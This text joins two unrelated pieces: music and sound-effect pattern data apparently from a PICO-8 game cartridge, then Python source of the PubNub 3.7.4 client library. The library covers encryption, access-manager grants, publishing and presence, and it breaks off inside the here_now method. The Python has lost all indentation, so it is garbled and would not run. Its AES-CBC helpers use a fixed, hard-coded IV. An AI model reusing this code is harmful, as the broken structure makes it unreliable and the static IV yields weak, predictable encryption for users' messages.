__sfx__
0110000000472004620c3400c34318470004311842500415003700c30500375183750c3000c3751f4730c375053720536211540114330c37524555247120c3730a470163521d07522375164120a211220252e315
01100000183732440518433394033c65539403185432b543184733940318433394033c655306053940339403184733940318423394033c655394031845321433184733940318473394033c655394033940339403
01100000247552775729755277552475527755297512775524755277552b755277552475527757297552775720755247572775524757207552475227755247522275526757297552675722752267522975526751
01100000001750c055003550c055001750c055003550c05500175180650c06518065001750c065003650c065051751106505365110650c17518075003650c0650a145160750a34516075111451d075113451d075
011000001b5771f55722537265171b5361f52622515265121b7771f76722757267471b7461f7362271522712185771b5571d53722517187361b7261d735227122454527537295252e5171d73514745227452e745
01100000275422754227542275422e5412e5452b7412b5422b5452b54224544245422754229541295422954224742277422e7422b7422b5422b5472954227542295422b742307422e5422e7472b547305462e742
0110000030555307652e5752b755295622e7722b752277622707227561297522b072295472774224042275421b4421b5451b5421b4421d542295471d442295422444624546245472444727546275462944729547
0110000000200002000020000200002000020000200002000020000200002000020000200002000020000200110171d117110171d227131211f227130371f2370f0411b1470f2471b35716051221571626722367
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e775000002e1752e075000002e1752e77500000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
__music__
00 00044208
00 00044108
00 00010304
00 00010304
01 00010203
00 00010203
00 00010305
00 00010306
00 00010305
00 00010306
00 00010245
02 00010243
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
00 41424344
|
pubnub.py |
## www.pubnub.com - PubNub Real-time push service in the cloud.
# coding=utf8
## PubNub Real-time Push APIs and Notifications Framework
## Copyright (c) 2014-15 Stephen Blum
## http://www.pubnub.com/
## -----------------------------------
## PubNub 3.7.4 Real-time Push Cloud API
## -----------------------------------
try:
import json
except ImportError:
import simplejson as json
import time
import hashlib
import uuid as uuid_lib
import random
import sys
import copy
from base64 import urlsafe_b64encode
from base64 import encodestring, decodestring
import hmac
from Crypto.Cipher import AES
try:
from hashlib import sha256
digestmod = sha256
except ImportError:
import Crypto.Hash.SHA256 as digestmod
sha256 = digestmod.new
##### vanilla python imports #####
try:
from urllib.parse import quote
except ImportError:
from urllib2 import quote
try:
import urllib.request
except ImportError:
import urllib2
try:
import requests
from requests.adapters import HTTPAdapter
except ImportError:
pass
#import urllib
import socket
import threading
try:
import urllib3.HTTPConnection
default_socket_options = urllib3.HTTPConnection.default_socket_options
except:
default_socket_options = []
default_socket_options += [
# Enable TCP keepalive
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
]
if sys.platform.startswith("linux"):
default_socket_options += [
# Send first keepalive packet 200 seconds after last data packet
(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 200),
# Resend keepalive packets every second, when unanswered
(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1),
# Close the socket after 5 unanswered keepalive packets
(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
]
elif sys.platform.startswith("darwin"):
# From /usr/include/netinet/tcp.h
# idle time used when SO_KEEPALIVE is enabled
socket.TCP_KEEPALIVE = socket.TCP_KEEPALIVE \
if hasattr(socket, 'TCP_KEEPALIVE') \
else 0x10
# interval between keepalives
socket.TCP_KEEPINTVL = socket.TCP_KEEPINTVL \
if hasattr(socket, 'TCP_KEEPINTVL') \
else 0x101
# number of keepalives before close
socket.TCP_KEEPCNT = socket.TCP_KEEPCNT \
if hasattr(socket, 'TCP_KEEPCNT') \
else 0x102
default_socket_options += [
# Send first keepalive packet 200 seconds after last data packet
(socket.IPPROTO_TCP, socket.TCP_KEEPALIVE, 200),
# Resend keepalive packets every second, when unanswered
(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1),
# Close the socket after 5 unanswered keepalive packets
(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
]
"""
# The Windows code is currently untested
elif sys.platform.startswith("win"):
import struct
from urllib3.connectionpool import HTTPConnectionPool, HTTPSConnectionPool
def patch_socket_keepalive(conn):
conn.sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
# Enable TCP keepalive
1,
# Send first keepalive packet 200 seconds after last data packet
200,
# Resend keepalive packets every second, when unanswered
1
))
class PubnubHTTPConnectionPool(HTTPConnectionPool):
def _validate_conn(self, conn):
super(PubnubHTTPConnectionPool, self)._validate_conn(conn)
class PubnubHTTPSConnectionPool(HTTPSConnectionPool):
def _validate_conn(self, conn):
super(PubnubHTTPSConnectionPool, self)._validate_conn(conn)
import urllib3.poolmanager
urllib3.poolmanager.pool_classes_by_scheme = {
'http' : PubnubHTTPConnectionPool,
'https' : PubnubHTTPSConnectionPool
}
"""
##################################
##### Tornado imports and globals #####
try:
import tornado.httpclient
import tornado.ioloop
from tornado.stack_context import ExceptionStackContext
ioloop = tornado.ioloop.IOLoop.instance()
except ImportError:
pass
#######################################
##### Twisted imports and globals #####
try:
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.protocol import Protocol
from twisted.web.client import Agent, ContentDecoderAgent
from twisted.web.client import RedirectAgent, GzipDecoder
from twisted.web.client import HTTPConnectionPool
from twisted.web.http_headers import Headers
from twisted.internet.ssl import ClientContextFactory
import twisted
pnconn_pool = HTTPConnectionPool(reactor, persistent=True)
pnconn_pool.maxPersistentPerHost = 100000
pnconn_pool.cachedConnectionTimeout = 15
pnconn_pool.retryAutomatically = True
class WebClientContextFactory(ClientContextFactory):
def getContext(self, hostname, port):
return ClientContextFactory.getContext(self)
class PubNubPamResponse(Protocol):
def __init__(self, finished):
self.finished = finished
def dataReceived(self, bytes):
self.finished.callback(bytes)
class PubNubResponse(Protocol):
def __init__(self, finished):
self.finished = finished
def dataReceived(self, bytes):
self.finished.callback(bytes)
except ImportError:
pass
#######################################
def get_data_for_user(data):
try:
if 'message' in data and 'payload' in data:
return {'message': data['message'], 'payload': data['payload']}
else:
return data
except TypeError:
return data
class PubnubCrypto2():
def pad(self, msg, block_size=16):
padding = block_size - (len(msg) % block_size)
return msg + chr(padding) * padding
def depad(self, msg):
return msg[0:-ord(msg[-1])]
def getSecret(self, key):
return hashlib.sha256(key).hexdigest()
def encrypt(self, key, msg):
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
enc = encodestring(cipher.encrypt(self.pad(msg)))
return enc
def decrypt(self, key, msg):
try:
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
plain = self.depad(cipher.decrypt(decodestring(msg)))
except:
return msg
try:
return json.loads(plain)
except SyntaxError:
return plain
class PubnubCrypto3():
def pad(self, msg, block_size=16):
padding = block_size - (len(msg) % block_size)
return msg + (chr(padding) * padding).encode('utf-8')
def depad(self, msg):
return msg[0:-ord(msg[-1])]
def getSecret(self, key):
return hashlib.sha256(key.encode("utf-8")).hexdigest()
def encrypt(self, key, msg):
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
return encodestring(
cipher.encrypt(self.pad(msg.encode('utf-8')))).decode('utf-8')
def decrypt(self, key, msg):
secret = self.getSecret(key)
Initial16bytes = '0123456789012345'
cipher = AES.new(secret[0:32], AES.MODE_CBC, Initial16bytes)
return (cipher.decrypt(
decodestring(msg.encode('utf-8')))).decode('utf-8')
class PubnubBase(object):
def __init__(
self,
publish_key,
subscribe_key,
secret_key=False,
cipher_key=False,
auth_key=None,
ssl_on=False,
origin='pubsub.pubnub.com',
uuid=None
):
"""Pubnub Class
Provides methods to communicate with Pubnub cloud
Attributes:
publish_key: Publish Key
subscribe_key: Subscribe Key
secret_key: Secret Key
cipher_key: Cipher Key
auth_key: Auth Key (used with Pubnub Access Manager i.e. PAM)
ssl: SSL enabled ?
origin: Origin
"""
self.origin = origin
self.version = '3.7.4'
self.limit = 1800
self.publish_key = publish_key
self.subscribe_key = subscribe_key
self.secret_key = secret_key
self.cipher_key = cipher_key
self.ssl = ssl_on
self.auth_key = auth_key
self.STATE = {}
self.http_debug = None
if self.ssl:
self.origin = 'https://' + self.origin
else:
self.origin = 'http://' + self.origin
self.uuid = uuid or str(uuid_lib.uuid4())
if type(sys.version_info) is tuple:
self.python_version = 2
self.pc = PubnubCrypto2()
else:
if sys.version_info.major == 2:
self.python_version = 2
self.pc = PubnubCrypto2()
else:
self.python_version = 3
self.pc = PubnubCrypto3()
if not isinstance(self.uuid, str):
raise AttributeError("uuid must be a string")
def set_http_debug(self, func=None):
self.http_debug = func
def _pam_sign(self, msg):
sign = urlsafe_b64encode(hmac.new(
self.secret_key.encode("utf-8"),
msg.encode("utf-8"),
sha256
).digest())
return quote(sign, safe="")
def set_u(self, u=False):
self.u = u
def _pam_auth(self, query, apicode=0, callback=None, error=None):
if 'timestamp' not in query:
query['timestamp'] = int(time.time())
## Global Grant?
if 'auth' in query and not query['auth']:
del query['auth']
if 'channel' in query and not query['channel']:
del query['channel']
if 'channel-group' in query and not query['channel-group']:
del query['channel-group']
params = "&".join([
x + "=" + quote(
str(query[x]), safe=""
) for x in sorted(query)
])
sign_input = "{subkey}\n{pubkey}\n{apitype}\n{params}".format(
subkey=self.subscribe_key,
pubkey=self.publish_key,
apitype="audit" if (apicode) else "grant",
params=params
)
query['signature'] = self._pam_sign(sign_input)
return self._request({"urlcomponents": [
'v1', 'auth', "audit" if (apicode) else "grant",
'sub-key',
self.subscribe_key
], 'urlparams': query},
self._return_wrapped_callback(callback),
self._return_wrapped_callback(error),
encoder_map={'signature': self._encode_pam})
def get_origin(self):
return self.origin
def set_auth_key(self, auth_key):
self.auth_key = auth_key
def get_auth_key(self):
return self.auth_key
def grant(self, channel=None, channel_group=None, auth_key=False,
read=False, write=False, manage=False, ttl=5, callback=None,
error=None):
"""Method for granting permissions.
This function establishes subscribe and/or write permissions for
PubNub Access Manager (PAM) by setting the read or write attribute
to true. A grant with read or write set to false (or not included)
will revoke any previous grants with read or write set to true.
Permissions can be applied to any one of three levels:
1. Application level privileges are based on subscribe_key applying
to all associated channels.
2. Channel level privileges are based on a combination of
subscribe_key and channel name.
3. User level privileges are based on the combination of
subscribe_key, channel and auth_key.
Args:
channel: (string) (optional)
Specifies channel name to grant permissions to.
If channel/channel_group is not specified, the grant
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to grant permissions to multiple channels
simultaneously by specifying the channels
as a comma separated list.
channel_group: (string) (optional)
Specifies channel group name to grant permissions to.
If channel/channel_group is not specified, the grant
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to grant permissions to multiple channel
groups simultaneously by specifying the channel groups
as a comma separated list.
auth_key: (string) (optional)
Specifies auth_key to grant permissions to.
It is possible to specify multiple auth_keys as comma
separated list in combination with a single channel
name. If auth_key is provided as the special-case
value "null" (or included in a comma-separated list,
eg. "null,null,abc"), a new auth_key will be generated
and returned for each "null" value.
read: (boolean) (default: True)
Read permissions are granted by setting to True.
Read permissions are removed by setting to False.
write: (boolean) (default: True)
Write permissions are granted by setting to true.
Write permissions are removed by setting to false.
manage: (boolean) (default: True)
Manage permissions are granted by setting to true.
Manage permissions are removed by setting to false.
ttl: (int) (default: 1440 i.e 24 hrs)
Time in minutes for which granted permissions are
valid. Max is 525600 , Min is 1.
Setting ttl to 0 will apply the grant indefinitely.
callback: (function) (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or tornado
error: (function) (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or tornado
Returns:
Returns a dict in sync mode i.e. when callback argument is not
given
The dict returned contains values with keys 'message' and 'payload'
Sample Response:
{
"message":"Success",
"payload":{
"ttl":5,
"auths":{
"my_ro_authkey":{"r":1,"w":0}
},
"subscribe_key":"my_subkey",
"level":"user",
"channel":"my_channel"
}
}
"""
return self._pam_auth({
'channel': channel,
'channel-group': channel_group,
'auth': auth_key,
'r': read and 1 or 0,
'w': write and 1 or 0,
'm': manage and 1 or 0,
'ttl': ttl,
'pnsdk': self.pnsdk
}, callback=callback, error=error)
def revoke(self, channel=None, channel_group=None, auth_key=None, ttl=1,
callback=None, error=None):
"""Method for revoking permissions.
Args:
channel: (string) (optional)
Specifies channel name to revoke permissions to.
If channel/channel_group is not specified, the revoke
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to grant permissions to multiple channels
simultaneously by specifying the channels as a comma
separated list.
channel_group: (string) (optional)
Specifies channel group name to revoke permissions to.
If channel/channel_group is not specified, the grant
applies to all channels associated with the
subscribe_key. If auth_key is not specified, it is
possible to revoke permissions to multiple channel
groups simultaneously by specifying the channel groups
as a comma separated list.
auth_key: (string) (optional)
Specifies auth_key to revoke permissions to.
It is possible to specify multiple auth_keys as comma
separated list in combination with a single channel
name. If auth_key is provided as the special-case
value "null" (or included in a comma-separated list,
eg. "null,null,abc"), a new auth_key will be generated
and returned for each "null" value.
ttl: (int) (default: 1440 i.e 24 hrs)
Time in minutes for which granted permissions are
valid.
Max is 525600 , Min is 1.
Setting ttl to 0 will apply the grant indefinitely.
callback: (function) (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (function) (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a dict in sync mode i.e. when callback argument is not
given.
The dict returned contains values with keys 'message' and 'payload'
Sample Response:
{
"message":"Success",
"payload":{
"ttl":5,
"auths":{
"my_authkey":{"r":0,"w":0}
},
"subscribe_key":"my_subkey",
"level":"user",
"channel":"my_channel"
}
}
"""
return self._pam_auth({
'channel': channel,
'channel-group': channel_group,
'auth': auth_key,
'r': 0,
'w': 0,
'ttl': ttl,
'pnsdk': self.pnsdk
}, callback=callback, error=error)
def audit(self, channel=None, channel_group=None, auth_key=None,
callback=None, error=None):
"""Method for fetching permissions from pubnub servers.
This method provides a mechanism to reveal existing PubNub Access
Manager attributes for any combination of subscribe_key, channel
and auth_key.
Args:
channel: (string) (optional)
Specifies channel name to return PAM
attributes optionally in combination with auth_key.
If channel/channel_group is not specified, results
for all channels associated with subscribe_key are
returned. If auth_key is not specified, it is possible
to return results for a comma separated list of
channels.
channel_group: (string) (optional)
Specifies channel group name to return PAM
attributes optionally in combination with auth_key.
If channel/channel_group is not specified, results
for all channels associated with subscribe_key are
returned. If auth_key is not specified, it is possible
to return results for a comma separated list of
channels.
auth_key: (string) (optional)
Specifies the auth_key to return PAM attributes for.
If only a single channel is specified, it is possible
to return results for a comma separated list of
auth_keys.
callback: (function) (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (function) (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Returns a dict in sync mode i.e. when callback argument is not
given
The dict returned contains values with keys 'message' and 'payload'
Sample Response
{
"message":"Success",
"payload":{
"channels":{
"my_channel":{
"auths":{"my_ro_authkey":{"r":1,"w":0},
"my_rw_authkey":{"r":0,"w":1},
"my_admin_authkey":{"r":1,"w":1}
}
}
},
}
Usage:
pubnub.audit ('my_channel'); # Sync Mode
"""
return self._pam_auth({
'channel': channel,
'channel-group': channel_group,
'auth': auth_key,
'pnsdk': self.pnsdk
}, 1, callback=callback, error=error)
def encrypt(self, message):
"""Method for encrypting data.
This method takes plaintext as input and returns encrypted data.
This need not be called directly as enncryption/decryption is
taken care of transparently by Pubnub class if cipher key is
provided at time of initializing pubnub object
Args:
message: Message to be encrypted.
Returns:
Returns encrypted message if cipher key is set
"""
if self.cipher_key:
message = json.dumps(self.pc.encrypt(
self.cipher_key, json.dumps(message)).replace('\n', ''))
else:
message = json.dumps(message)
return message
def decrypt(self, message):
"""Method for decrypting data.
This method takes ciphertext as input and returns decrypted data.
This need not be called directly as enncryption/decryption is
taken care of transparently by Pubnub class if cipher key is
provided at time of initializing pubnub object
Args:
message: Message to be decrypted.
Returns:
Returns decrypted message if cipher key is set
"""
if self.cipher_key:
message = self.pc.decrypt(self.cipher_key, message)
return message
def _return_wrapped_callback(self, callback=None):
def _new_format_callback(response):
if self.http_debug is not None:
self.http_debug(response)
if 'payload' in response:
if (callback is not None):
callback_data = dict()
callback_data['payload'] = response['payload']
if 'message' in response:
callback_data['message'] = response['message']
if (callback is not None):
callback(callback_data)
else:
if (callback is not None):
callback(response)
if (callback is not None):
return _new_format_callback
else:
return None
def leave_channel(self, channel, callback=None, error=None):
## Send leave
return self._request({"urlcomponents": [
'v2', 'presence',
'sub_key',
self.subscribe_key,
'channel',
channel,
'leave'
], 'urlparams':
{'auth': self.auth_key, 'pnsdk': self.pnsdk, "uuid": self.uuid, }},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def leave_group(self, channel_group, callback=None, error=None):
## Send leave
return self._request({"urlcomponents": [
'v2', 'presence',
'sub_key',
self.subscribe_key,
'channel',
',',
'leave'
], 'urlparams':
{'auth': self.auth_key, 'pnsdk': self.pnsdk,
'channel-group': channel_group,
"uuid": self.uuid, }},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def publish(self, channel, message, callback=None, error=None):
"""Publishes data on a channel.
The publish() method is used to send a message to all subscribers of
a channel. To publish a message you must first specify a valid
publish_key at initialization. A successfully published message is
replicated across the PubNub Real-Time Network and sent simultaneously
to all subscribed clients on a channel. Messages in transit can be
secured from potential eavesdroppers with SSL/TLS by setting ssl to
True during initialization.
Published messages can also be encrypted with AES-256 simply by
specifying a cipher_key during initialization.
Args:
channel: (string)
Specifies channel name to publish messages to.
message: (string/int/double/dict/list)
Message to be published
callback: (optional)
A callback method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
An error method can be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode : list
Async Mode : None
The function returns the following formatted response:
[ Number, "Status", "Time Token"]
The output below demonstrates the response to a successful call:
[1,"Sent","13769558699541401"]
"""
message = self.encrypt(message)
## Send Message
return self._request({"urlcomponents": [
'publish',
self.publish_key,
self.subscribe_key,
'0',
channel,
'0',
message
], 'urlparams': {'auth': self.auth_key, 'pnsdk': self.pnsdk}},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def presence(self, channel, callback, error=None, connect=None,
disconnect=None, reconnect=None):
"""Subscribe to presence events on a channel.
Only works in async mode
Args:
channel: Channel name ( string ) on which to listen for events
callback: A callback method should be passed as parameter.
If passed, the api works in async mode.
Required argument when working with twisted or tornado.
error: Optional variable.
An error method can be passed as
parameter. If set, the api works in async mode.
Returns:
None
"""
return self.subscribe(channel + '-pnpres', callback=callback,
error=error, connect=connect,
disconnect=disconnect,
reconnect=reconnect)
def presence_group(self, channel_group, callback, error=None,
connect=None, disconnect=None, reconnect=None):
"""Subscribe to presence events on a channel group.
Only works in async mode
Args:
channel_group: Channel group name ( string )
callback: A callback method should be passed to the method.
If passed, the api works in async mode.
Required argument when working with twisted or tornado.
error: Optional variable. An error method can be passed as
parameter.
If passed, the api works in async mode.
Returns:
None
"""
return self.subscribe_group(channel_group + '-pnpres',
callback=callback, error=error,
connect=connect,
disconnect=disconnect,
reconnect=reconnect)
def state(self, channel=None, channel_group=None, uuid=None, state=None,
callback=None, error=None):
"""Get/Set state data.
The state API is used to set key/value pairs specific to a subscriber
uuid.
State information is supplied as a dict of key/value pairs.
Args:
state: (string) (optional)
Specifies the channel name to return occupancy
results. If channel is not provided, here_now will
return data for all channels.
uuid: (string) (optional)
The subscriber uuid to set state for or get current
state from.
Default is current uuid.
channel: (string) (optional)
Specifies the channel for which state is to be
set/get.
channel_group: (string) (optional)
Specifies the channel_group for which state is to
be set/get.
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed to
the method. If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: Object
Async Mode: None
Response Format:
The state API returns a JSON object containing key value pairs.
Example Response:
{
first : "Robert",
last : "Plant",
age : 59,
region : "UK"
}
"""
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk}
try:
if (channel and self.subscriptions[channel] and
self.subscriptions[channel].subscribed and
state is not None):
self.STATE[channel] = state
except KeyError:
pass
if channel_group and state is not None:
try:
if (self.subscription_groups[channel_group] and
self.subscription_groups[channel_group].subscribed):
self.STATE[channel_group] = state
except KeyError:
pass
data['channel-group'] = channel_group
if channel is None or len(channel) >= 0:
channel = ','
if uuid is None:
uuid = self.uuid
if state is not None:
data['state'] = json.dumps(state)
urlcomponents = [
'v2', 'presence',
'sub-key', self.subscribe_key,
'channel', channel,
'uuid', uuid,
'data'
]
else:
urlcomponents = [
'v2', 'presence',
'sub-key', self.subscribe_key,
'channel', channel,
'uuid', uuid
]
## Get Presence Here Now
return self._request({"urlcomponents": urlcomponents,
'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def where_now(self, uuid=None, callback=None, error=None):
"""Get where now data.
You can obtain information about the current list of a channels to
which a uuid is subscribed to by calling the where_now() function
in your application.
Args:
uuid: (optional)
Specifies the uuid to return channel list for.
Default is current uuid.
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
Returns:
Sync Mode: list
Async Mode: None
Response Format:
The where_now() method returns a list of channels to which
uuid is currently subscribed.
channels:["String","String", ... ,"String"] - List of Channels
uuid is currently subscribed to.
Example Response:
{
"channels":
[
"lobby",
"game01",
"chat"
]
}
"""
urlcomponents = [
'v2', 'presence',
'sub_key', self.subscribe_key,
'uuid'
]
if (uuid is not None and len(uuid) > 0):
urlcomponents.append(uuid)
else:
urlcomponents.append(self.uuid)
data = {'auth': self.auth_key, 'pnsdk': self.pnsdk}
## Get Presence Where Now
return self._request({"urlcomponents": urlcomponents,
'urlparams': data},
callback=self._return_wrapped_callback(callback),
error=self._return_wrapped_callback(error))
def here_now(self, channel, uuids=True, state=False,
callback=None, error=None):
"""Get here now data.
You can obtain information about the current state of a channel
including a list of unique user-ids currently subscribed to the
channel and the total occupancy count of the channel by calling
the here_now() function in your application.
Args:
channel: (string) (optional)
Specifies the channel name to return occupancy
results. If channel is not provided, here_now will
return data for all channels.
callback: (optional)
A callback method should be passed to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado.
error: (optional)
Optional variable. An error method can be passed
to the method.
If set, the api works in async mode.
Required argument when working with twisted or
tornado .
Returns:
Sync Mode: list
Async Mode: None
Response Format:
The here_now() method returns a list of uuid s currently
subscribed to the channel.
uuids:["String","String", ... ,"String"] - List of UUIDs currently
subscribed to the channel.
occupancy: Number - Total current occupancy of the channel.
Example Response:
{
occupancy: 4,
uuids: [
'123123234t234f34fq3dq',
'143r34f34t34fq34q34q3',
'23f34d3f4rq34r34rq23q',
'w34tcw45t45tcw435tww3',
]
}
"""
urlcomponents = [
'v2', 'presence',
